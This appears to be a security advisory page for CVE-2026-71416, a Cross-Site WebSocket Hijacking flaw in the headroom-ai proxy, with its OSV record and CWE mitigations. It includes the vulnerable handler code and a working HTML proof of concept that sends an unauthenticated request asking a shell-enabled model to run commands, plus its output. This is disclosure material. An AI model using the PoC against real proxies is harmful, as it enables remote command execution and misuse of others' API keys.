        let socket = new WebSocket(`ws://${headroomHost}:8787/v1/responses`);

        let openAiPayload = {
            type: "response.create",
            model: "gpt-5.4",
            instructions: "The local bash shell environment is on Linux.",
            input: "Run the id command for the logged in user",
            tools: [{type: "shell", environment: {type: "local"}}]
        };

        socket.addEventListener("open", (event) => {
            let openAiPayloadStr = JSON.stringify(openAiPayload);
            console.log(`Sending LLM request: ${openAiPayloadStr}`);
            socket.send(openAiPayloadStr);
        });

        socket.addEventListener("message", (event) => {
            console.log(`Response from server: ${event.data}`);
        });
    </script>
</body>
</html>
  • The PoC uses the shell tool, but any tool/input/instruction prompt can be used.

Output

The console.log() output from the PoC shows that the malicious WebSocket client request was accepted by Headroom and forwarded to the upstream OpenAI API. The server responses show that I have an insufficient quota to perform the LLM request, but proves that it was attempted:

Sending LLM request: {"type":"response.create","model":"gpt-5.4","instructions":"The local bash shell environment is on Linux.","input":"Run the id command for the logged in user","tools":[{"type":"shell","environment":{"type":"local"}}]}
ws.html:22 Response from server: {"type":"response.created","response":{"id":"resp_062c8e90dd914f0b006a229117f800819ca7de4f15a51a305b","object":"response","created_at":1780650263,"status":"in_progress","background":false,"completed_at":null,"error":null,"frequency_penalty":0.0,"incomplete_details":null,"instructions":"The local bash shell environment is on Linux.","max_output_tokens":null,"max_tool_calls":null,"model":"gpt-5.4-2026-03-05","moderation":null,"output":[],"parallel_tool_calls":true,"presence_penalty":0.0,"previous_response_id":null,"prompt_cache_key":null,"prompt_cache_retention":"24h","reasoning":{"context":"current_turn","effort":"none","summary":null},"safety_identifier":null,"service_tier":"auto","store":true,"temperature":1.0,"text":{"format":{"type":"text"},"verbosity":"medium"},"tool_choice":"auto","tools":[{"type":"shell","environment":{"type":"local"}}],"top_logprobs":0,"top_p":0.98,"truncation":"disabled","usage":null,"user":null,"metadata":{}},"sequence_number":0}
ws.html:22 Response from server: {"type":"response.in_progress","response":{"id":"resp_062c8e90dd914f0b006a229117f800819ca7de4f15a51a305b","object":"response","created_at":1780650263,"status":"in_progress","background":false,"completed_at":null,"error":null,"frequency_penalty":0.0,"incomplete_details":null,"instructions":"The local bash shell environment is on Linux.","max_output_tokens":null,"max_tool_calls":null,"model":"gpt-5.4-2026-03-05","moderation":null,"output":[],"parallel_tool_calls":true,"presence_penalty":0.0,"previous_response_id":null,"prompt_cache_key":null,"prompt_cache_retention":"24h","reasoning":{"context":"current_turn","effort":"none","summary":null},"safety_identifier":null,"service_tier":"auto","store":true,"temperature":1.0,"text":{"format":{"type":"text"},"verbosity":"medium"},"tool_choice":"auto","tools":[{"type":"shell","environment":{"type":"local"}}],"top_logprobs":0,"top_p":0.98,"truncation":"disabled","usage":null,"user":null,"metadata":{}},"sequence_number":1}
ws.html:22 Response from server: {"type":"error","error":{"type":"insufficient_quota","code":"insufficient_quota","message":"You exceeded your current quota, please check your plan and billing details. For more information on this error, read the docs: https://platform.openai.com/docs/guides/error-codes/api-errors.","param":null},"sequence_number":2}
ws.html:22 Response from server: {"type":"response.failed","response":{"id":"resp_062c8e90dd914f0b006a229117f800819ca7de4f15a51a305b","object":"response","created_at":1780650263,"status":"failed","background":false,"completed_at":null,"error":{"code":"insufficient_quota","message":"You exceeded your current quota, please check your plan and billing details. For more information on this error, read the docs: https://platform.openai.com/docs/guides/error-codes/api-errors."},"frequency_penalty":0.0,"incomplete_details":null,"instructions":"The local bash shell environment is on Linux.","max_output_tokens":null,"max_tool_calls":null,"model":"gpt-5.4-2026-03-05","moderation":null,"output":[],"parallel_tool_calls":true,"presence_penalty":0.0,"previous_response_id":null,"prompt_cache_key":null,"prompt_cache_retention":"24h","reasoning":{"context":"current_turn","effort":"none","summary":null},"safety_identifier":null,"service_tier":"auto","store":true,"temperature":1.0,"text":{"format":{"type":"text"},"verbosity":"medium"},"tool_choice":"auto","tools":[{"type":"shell","environment":{"type":"local"}}],"top_logprobs":0,"top_p":0.98,"truncation":"disabled","usage":null,"user":null,"metadata":{}},"sequence_number":3}

Impact

Allowing malicious WebSocket clients to perform arbitrary LLM requests could leverage tools such as the shell tool to perform arbitrary commands leading to RCE. Other tools or prompts could be used to disclose sensitive information or perform expensive LLM requests to waste an organisations quota.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "headroom-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.35.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-71416"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-02T23:09:15Z",
    "nvd_published_at": "2026-09-11T14:17:32Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Headroom WebSocket server does not validate the `Origin` header of incoming client WebSocket requests before forwarding the request to the upstream server, allowing malicious WebSocket clients to perform arbitrary LLM requests without authentication. This can be exploited by a malicious WebSocket client executed in a traditional or headless browser such as lightpanda, if the browser has access to the Headroom proxy and the OpenAI API key is stored in the `OPENAI_API_KEY` environment variable.\n\n### Details\nThe Headroom server defines a WebSocket handler at `ws://\u003cheadroom_host\u003e:8787/v1/responses` in `headroom/providers/proxy_routes.py`:\n```python\n    @app.websocket(\"/v1/responses\")\n    async def openai_responses_ws(websocket: WebSocket):\n        await proxy.handle_openai_responses_ws(websocket)\n```\nIn the `handle_openai_responses_ws()` method of the `OpenAIHandlerMixin` class, the `Origin` header of the WebSocket client handshake is not checked or verified before calling `websocket.accept()`, which grants any WebSocket client (including malicious clients) access to the server:\n```python\n    async def handle_openai_responses_ws(self, websocket: WebSocket) -\u003e None:\n        \"\"\"WebSocket proxy for /v1/responses (Codex gpt-5.4+).\n\n        Newer Codex versions use WebSocket instead of HTTP POST for the\n        Responses API.  This handler:\n        1. Accepts the client WebSocket\n        2. Receives the first message (``response.create`` request)\n        3. Opens an upstream WebSocket to OpenAI\n        4. Compresses eligible `response.create` text through the Python\n           ContentRouter path, then sends the request upstream\n        5. Relays all subsequent messages bidirectionally\n        \"\"\"\n        ...\n\n        # Accept client connection with the requested subprotocol\n        async with stage_timer.measure(\"accept\"):\n            if client_subprotocols:\n                await websocket.accept(subprotocol=client_subprotocols[0])\n            else:\n                await websocket.accept()\n```\nThe malicious WebSocket client does not need to provide authentication headers or API keys as the `Authorization` header is automatically populated with the OpenAI API key via the `OPENAI_API_KEY` environment variable, if it has been used to store the API key:\n```python\n        # Ensure Authorization header is present \u2014 fall back to OPENAI_API_KEY env var.\n        # Safety net for clients that don\u0027t forward auth headers via WebSocket upgrade.\n        if \"authorization\" not in _lower_headers:\n            api_key = os.environ.get(\"OPENAI_API_KEY\")\n            if api_key:\n                upstream_headers[\"Authorization\"] = f\"Bearer {api_key}\"\n                logger.debug(f\"[{request_id}] WS: injected Authorization from OPENAI_API_KEY env\")\n            else:\n                logger.warning(\n                    f\"[{request_id}] WS: no Authorization header from client and \"\n                    f\"OPENAI_API_KEY not set \u2014 upstream will likely reject\"\n                )\n```\nOnce the client connection is accepted and authenticated malicious WebSocket clients can perform arbitrary LLM requests to the OpenAI API, including arbitrary `instructions`/`input` prompts and tools.\n\n### PoC\n- Run the Headroom proxy server: `OPENAI_API_KEY=MY_KEY headroom proxy --host 0.0.0.0`\n- Render the following HTML PoC page in a traditional or headless browser which has access to the Headroom proxy server:\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\t\u003cscript\u003e\n\t\tlet headroomHost = \u0027192.168.0.106\u0027;\n\t\tlet socket = new WebSocket(`ws://${headroomHost}:8787/v1/responses`);\n\n\t\tlet openAiPayload = {\n\t\t\ttype: \"response.create\",\n\t\t\tmodel: \"gpt-5.4\",\n\t\t\tinstructions: \"The local bash shell environment is on Linux.\",\n\t\t\tinput: \"Run the id command for the logged in user\",\n\t\t\ttools: [{type: \"shell\", environment: {type: \"local\"}}]\n\t\t};\n\n\t\tsocket.addEventListener(\"open\", (event) =\u003e {\n\t\t\tlet openAiPayloadStr = JSON.stringify(openAiPayload);\n\t\t\tconsole.log(`Sending LLM request: ${openAiPayloadStr}`);\n\t\t  \tsocket.send(openAiPayloadStr);\n\t\t});\n\n\t\tsocket.addEventListener(\"message\", (event) =\u003e {\n\t\t  \tconsole.log(`Response from server: ${event.data}`);\n\t\t});\n\t\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n``` \n- The PoC uses the shell tool, but any tool/input/instruction prompt can be used. \n#### Output\nThe `console.log()` output from the PoC shows that the malicious WebSocket client request was accepted by Headroom and forwarded to the upstream OpenAI API. The server responses show that I have an insufficient quota to perform the LLM request, but proves that it was attempted:\n```\nSending LLM request: {\"type\":\"response.create\",\"model\":\"gpt-5.4\",\"instructions\":\"The local bash shell environment is on Linux.\",\"input\":\"Run the id command for the logged in user\",\"tools\":[{\"type\":\"shell\",\"environment\":{\"type\":\"local\"}}]}\nws.html:22 Response from server: {\"type\":\"response.created\",\"response\":{\"id\":\"resp_062c8e90dd914f0b006a229117f800819ca7de4f15a51a305b\",\"object\":\"response\",\"created_at\":1780650263,\"status\":\"in_progress\",\"background\":false,\"completed_at\":null,\"error\":null,\"frequency_penalty\":0.0,\"incomplete_details\":null,\"instructions\":\"The local bash shell environment is on Linux.\",\"max_output_tokens\":null,\"max_tool_calls\":null,\"model\":\"gpt-5.4-2026-03-05\",\"moderation\":null,\"output\":[],\"parallel_tool_calls\":true,\"presence_penalty\":0.0,\"previous_response_id\":null,\"prompt_cache_key\":null,\"prompt_cache_retention\":\"24h\",\"reasoning\":{\"context\":\"current_turn\",\"effort\":\"none\",\"summary\":null},\"safety_identifier\":null,\"service_tier\":\"auto\",\"store\":true,\"temperature\":1.0,\"text\":{\"format\":{\"type\":\"text\"},\"verbosity\":\"medium\"},\"tool_choice\":\"auto\",\"tools\":[{\"type\":\"shell\",\"environment\":{\"type\":\"local\"}}],\"top_logprobs\":0,\"top_p\":0.98,\"truncation\":\"disabled\",\"usage\":null,\"user\":null,\"metadata\":{}},\"sequence_number\":0}\nws.html:22 Response from server: {\"type\":\"response.in_progress\",\"response\":{\"id\":\"resp_062c8e90dd914f0b006a229117f800819ca7de4f15a51a305b\",\"object\":\"response\",\"created_at\":1780650263,\"status\":\"in_progress\",\"background\":false,\"completed_at\":null,\"error\":null,\"frequency_penalty\":0.0,\"incomplete_details\":null,\"instructions\":\"The local bash shell environment is on Linux.\",\"max_output_tokens\":null,\"max_tool_calls\":null,\"model\":\"gpt-5.4-2026-03-05\",\"moderation\":null,\"output\":[],\"parallel_tool_calls\":true,\"presence_penalty\":0.0,\"previous_response_id\":null,\"prompt_cache_key\":null,\"prompt_cache_retention\":\"24h\",\"reasoning\":{\"context\":\"current_turn\",\"effort\":\"none\",\"summary\":null},\"safety_identifier\":null,\"service_tier\":\"auto\",\"store\":true,\"temperature\":1.0,\"text\":{\"format\":{\"type\":\"text\"},\"verbosity\":\"medium\"},\"tool_choice\":\"auto\",\"tools\":[{\"type\":\"shell\",\"environment\":{\"type\":\"local\"}}],\"top_logprobs\":0,\"top_p\":0.98,\"truncation\":\"disabled\",\"usage\":null,\"user\":null,\"metadata\":{}},\"sequence_number\":1}\nws.html:22 Response from server: {\"type\":\"error\",\"error\":{\"type\":\"insufficient_quota\",\"code\":\"insufficient_quota\",\"message\":\"You exceeded your current quota, please check your plan and billing details. For more information on this error, read the docs: https://platform.openai.com/docs/guides/error-codes/api-errors.\",\"param\":null},\"sequence_number\":2}\nws.html:22 Response from server: {\"type\":\"response.failed\",\"response\":{\"id\":\"resp_062c8e90dd914f0b006a229117f800819ca7de4f15a51a305b\",\"object\":\"response\",\"created_at\":1780650263,\"status\":\"failed\",\"background\":false,\"completed_at\":null,\"error\":{\"code\":\"insufficient_quota\",\"message\":\"You exceeded your current quota, please check your plan and billing details. For more information on this error, read the docs: https://platform.openai.com/docs/guides/error-codes/api-errors.\"},\"frequency_penalty\":0.0,\"incomplete_details\":null,\"instructions\":\"The local bash shell environment is on Linux.\",\"max_output_tokens\":null,\"max_tool_calls\":null,\"model\":\"gpt-5.4-2026-03-05\",\"moderation\":null,\"output\":[],\"parallel_tool_calls\":true,\"presence_penalty\":0.0,\"previous_response_id\":null,\"prompt_cache_key\":null,\"prompt_cache_retention\":\"24h\",\"reasoning\":{\"context\":\"current_turn\",\"effort\":\"none\",\"summary\":null},\"safety_identifier\":null,\"service_tier\":\"auto\",\"store\":true,\"temperature\":1.0,\"text\":{\"format\":{\"type\":\"text\"},\"verbosity\":\"medium\"},\"tool_choice\":\"auto\",\"tools\":[{\"type\":\"shell\",\"environment\":{\"type\":\"local\"}}],\"top_logprobs\":0,\"top_p\":0.98,\"truncation\":\"disabled\",\"usage\":null,\"user\":null,\"metadata\":{}},\"sequence_number\":3}\n```\n\n### Impact\nAllowing malicious WebSocket clients to perform arbitrary LLM requests could leverage tools such as the shell tool to perform arbitrary commands leading to RCE. Other tools or prompts could be used to disclose sensitive information or perform expensive LLM requests to waste an organisations quota.",
  "id": "GHSA-h46j-26q3-rggf",
  "modified": "2026-10-02T23:09:15Z",
  "published": "2026-10-02T23:09:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/headroomlabs-ai/headroom/security/advisories/GHSA-h46j-26q3-rggf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-71416"
    },
    {
      "type": "WEB",
      "url": "https://github.com/headroomlabs-ai/headroom/pull/1481"
    },
    {
      "type": "WEB",
      "url": "https://github.com/headroomlabs-ai/headroom/commit/c632023cc1ec61d15f8f8e86efe3b54d51604a64"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/headroomlabs-ai/headroom"
    },
    {
      "type": "WEB",
      "url": "https://github.com/headroomlabs-ai/headroom/releases/tag/v0.35.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Headroom vulnerable to Cross-Site WebSocket Hijacking (CSWSH)"
}

Mitigation
Implementation

Enable CORS-like access restrictions by verifying the 'Origin' header during the WebSocket handshake.

Mitigation
Implementation

Use a randomized CSRF token to verify requests.

Mitigation
Implementation

Use TLS to securely communicate using 'wss' (WebSocket Secure) instead of 'ws'.

Mitigation
Architecture and Design Implementation

Require user authentication prior to the WebSocket connection being established. For example, the WS library in Node has a 'verifyClient' function.

Mitigation
Implementation

Leverage rate limiting to prevent against DoS. Use of the leaky bucket algorithm can help with this.

Mitigation
Implementation

Use a library that provides restriction of the payload size. For example, WS library for Node includes 'maxPayloadoption' that can be set.

Mitigation
Implementation

Treat data/input as untrusted in both directions and apply the same data/input sanitization as XSS, SQLi, etc.

No CAPEC attack patterns related to this CWE.